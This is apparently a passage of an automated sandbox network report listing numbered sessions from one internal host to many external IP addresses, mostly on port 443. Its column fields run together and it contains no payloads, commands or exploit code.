                                            29434192.168.2.2344878168.205.150.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29435192.168.2.23510202.145.215.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29436192.168.2.2351520186.32.185.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29437192.168.2.2336598157.232.99.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29438192.168.2.234513693.232.176.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29439192.168.2.2346768208.122.18.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29440192.168.2.2355148131.225.236.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29441192.168.2.235133839.153.167.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29442192.168.2.235035849.67.173.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29443192.168.2.2334458153.65.179.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29444192.168.2.2348118201.212.242.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29445192.168.2.2340284170.228.58.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29446192.168.2.2351312219.213.148.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29447192.168.2.2348836140.11.26.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29448192.168.2.2337410151.38.179.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29449192.168.2.2356792164.75.218.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29450192.168.2.2357690138.58.171.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29451192.168.2.236021871.148.198.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29452192.168.2.2341848170.52.62.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29453192.168.2.234413484.212.220.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29454192.168.2.233437480.91.90.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29455192.168.2.2333208131.232.139.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29456192.168.2.2360330138.10.194.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29457192.168.2.2351434202.127.98.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29458192.168.2.233733087.69.187.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29459192.168.2.233506672.158.11.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29460192.168.2.233765675.130.176.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29461192.168.2.2340354104.20.11.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29462192.168.2.23525162.250.103.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29463192.168.2.2352972221.252.43.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29464192.168.2.2337728182.163.184.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29465192.168.2.2351056108.234.199.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29466192.168.2.234273480.140.212.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29467192.168.2.233923444.48.242.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29468192.168.2.234668667.234.240.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29469192.168.2.2354032191.124.20.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29470192.168.2.2343120126.148.197.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29471192.168.2.2350872150.179.161.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29472192.168.2.2332770181.93.249.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29473192.168.2.2355644181.166.63.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29474192.168.2.2347998118.86.89.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29475192.168.2.2351084222.243.129.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29476192.168.2.2354152121.74.78.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29477192.168.2.2357334155.127.160.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29478192.168.2.2355026188.174.105.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29479192.168.2.2353414144.139.134.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29480192.168.2.2344762149.151.18.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29481192.168.2.2358312203.44.51.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29482192.168.2.2349844182.102.186.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29483192.168.2.2334172173.52.189.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29484192.168.2.234401250.185.104.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29485192.168.2.2348288119.227.239.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29486192.168.2.235733837.63.42.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29487192.168.2.2358912218.59.163.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29488192.168.2.2360484160.41.98.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29489192.168.2.2342626177.148.14.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29490192.168.2.2359134207.111.97.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29491192.168.2.2337738205.132.67.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29492192.168.2.2348422169.40.26.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29493192.168.2.235030024.148.190.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29494192.168.2.235279079.112.11.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29495192.168.2.2354320217.234.234.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29496192.168.2.235158849.219.252.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29497192.168.2.2353662170.237.232.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29498192.168.2.2358734104.153.202.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29499192.168.2.235834886.69.95.24737215
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29500192.168.2.235767023.145.205.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29501192.168.2.2336784180.235.127.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29502192.168.2.233891484.209.42.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29503192.168.2.2345564122.228.226.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29504192.168.2.233816454.88.113.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29505192.168.2.235025051.179.198.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29506192.168.2.2355872119.32.144.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29507192.168.2.2351904154.143.139.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29508192.168.2.2357792197.186.30.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29509192.168.2.2344504102.228.149.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29510192.168.2.2360810218.43.51.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29511192.168.2.2347846222.101.219.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29512192.168.2.235687840.240.165.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29513192.168.2.235123214.213.100.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29514192.168.2.2352932153.106.214.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29515192.168.2.2344472102.147.208.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29516192.168.2.234846048.3.51.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29517192.168.2.23358389.177.229.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29518192.168.2.2357848102.243.46.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29519192.168.2.2356598114.188.81.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29520192.168.2.235639813.139.12.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29521192.168.2.2340906195.189.133.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29522192.168.2.2341280112.51.233.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29523192.168.2.234495658.75.144.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29524192.168.2.234457465.50.231.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29525192.168.2.2344652106.48.240.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29526192.168.2.235433440.144.245.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29527192.168.2.2334632128.8.71.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29528192.168.2.2349180100.171.184.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29529192.168.2.233935244.113.157.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29530192.168.2.2335070154.133.148.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29531192.168.2.235382642.128.151.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29532192.168.2.2341218170.108.55.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29533192.168.2.234141887.225.45.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29534192.168.2.234293666.45.232.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29535192.168.2.233756037.54.111.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29536192.168.2.2342616189.222.141.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29537192.168.2.2347846140.95.129.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29538192.168.2.2340074102.232.7.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29539192.168.2.2346904125.38.105.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29540192.168.2.235899419.144.229.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29541192.168.2.235555895.84.83.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29542192.168.2.2350832167.216.180.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29543192.168.2.2360208182.184.199.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29544192.168.2.2337574121.65.200.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29545192.168.2.2341982174.68.92.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29546192.168.2.235345268.14.244.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29547192.168.2.233605068.112.3.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29548192.168.2.2333722158.74.94.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29549192.168.2.235688641.160.101.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29550192.168.2.2346708159.178.236.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29551192.168.2.2335392116.213.33.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29552192.168.2.2357514165.126.160.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29553192.168.2.2345084172.57.219.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29554192.168.2.2332866118.56.27.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29555192.168.2.2356956156.255.185.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29556192.168.2.2353020222.140.225.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29557192.168.2.233487817.87.249.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29558192.168.2.2339610120.43.171.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29559192.168.2.234730653.136.65.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29560192.168.2.2356422211.144.198.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29561192.168.2.235675659.31.86.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29562192.168.2.234962220.68.208.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29563192.168.2.234732834.91.236.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29564192.168.2.2340918151.89.142.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29565192.168.2.2349286188.202.172.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29566192.168.2.23364862.128.91.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29567192.168.2.234476098.149.246.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29568192.168.2.2354572212.28.134.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29569192.168.2.2359272205.218.87.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29570192.168.2.234313677.230.174.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29571192.168.2.2336068140.74.152.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29572192.168.2.235007640.148.172.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29573192.168.2.2341104124.103.137.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29574192.168.2.2344358173.173.46.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29575192.168.2.2347758177.114.215.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29576192.168.2.2356498128.17.52.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29577192.168.2.233417280.69.176.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29578192.168.2.2351572199.249.218.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29579192.168.2.23430605.51.43.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29580192.168.2.2358880136.92.163.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29581192.168.2.2355904129.8.83.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29582192.168.2.2334012138.100.144.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29583192.168.2.2340144206.43.155.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29584192.168.2.235208660.65.162.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29585192.168.2.235322292.26.217.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29586192.168.2.233612263.233.43.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29587192.168.2.235333072.129.128.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29588192.168.2.2342588151.135.68.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29589192.168.2.235338640.132.102.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29590192.168.2.2346934158.111.27.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29591192.168.2.2340626178.50.133.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29592192.168.2.2359256163.145.85.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29593192.168.2.234634614.240.150.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29594192.168.2.2341794148.136.9.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29595192.168.2.234091842.158.212.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29596192.168.2.2338630180.54.81.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29597192.168.2.235301625.78.168.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29598192.168.2.2347934210.177.176.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29599192.168.2.235198875.181.150.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29600192.168.2.234263685.12.152.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29601192.168.2.2348320151.67.240.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29602192.168.2.2356370163.89.166.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29603192.168.2.2360688124.91.15.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29604192.168.2.235386440.224.125.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29605192.168.2.233330268.180.86.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29606192.168.2.2358410154.52.140.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29607192.168.2.2359474158.235.101.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29608192.168.2.2343176213.251.78.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29609192.168.2.2335148202.247.22.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29610192.168.2.2340002177.100.11.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29611192.168.2.233319036.33.67.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29612192.168.2.235814464.68.7.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29613192.168.2.2347798155.188.219.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29614192.168.2.235764870.40.19.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29615192.168.2.236016814.251.249.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29616192.168.2.2341006110.202.108.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29617192.168.2.2340322147.45.244.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29618192.168.2.234217423.188.220.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29619192.168.2.2336380181.230.18.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29620192.168.2.2350374105.152.25.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29621192.168.2.234408414.169.42.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29622192.168.2.2345724155.194.173.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29623192.168.2.235258070.145.34.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29624192.168.2.23519025.215.102.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29625192.168.2.2357818172.210.222.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29626192.168.2.2339448213.69.155.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29627192.168.2.23557304.11.42.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29628192.168.2.2343262195.179.117.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29629192.168.2.233548076.129.8.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29630192.168.2.235765258.147.42.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29631192.168.2.2337594157.96.222.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29632192.168.2.2353072116.238.51.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29633192.168.2.2344042115.39.23.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29634192.168.2.2333786177.83.130.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29635192.168.2.2360054178.180.167.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29636192.168.2.2334224115.14.108.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29637192.168.2.233886666.213.39.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29638192.168.2.233733880.147.101.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29639192.168.2.2351892124.155.191.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29640192.168.2.2342100200.54.57.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29641192.168.2.2347566179.75.217.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29642192.168.2.235813054.193.145.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29643192.168.2.235840093.239.95.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29644192.168.2.234348466.143.242.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29645192.168.2.2344822222.73.239.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29646192.168.2.234958839.159.11.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29647192.168.2.2332778163.227.79.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29648192.168.2.2359448175.233.175.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29649192.168.2.2337198165.41.170.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29650192.168.2.2354012132.87.87.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29651192.168.2.2347042163.230.30.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29652192.168.2.2349058194.19.202.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29653192.168.2.2333990125.17.69.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29654192.168.2.2359824161.198.143.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29655192.168.2.2343432137.120.112.200443
                                            TimestampBytes transferredDirectionData


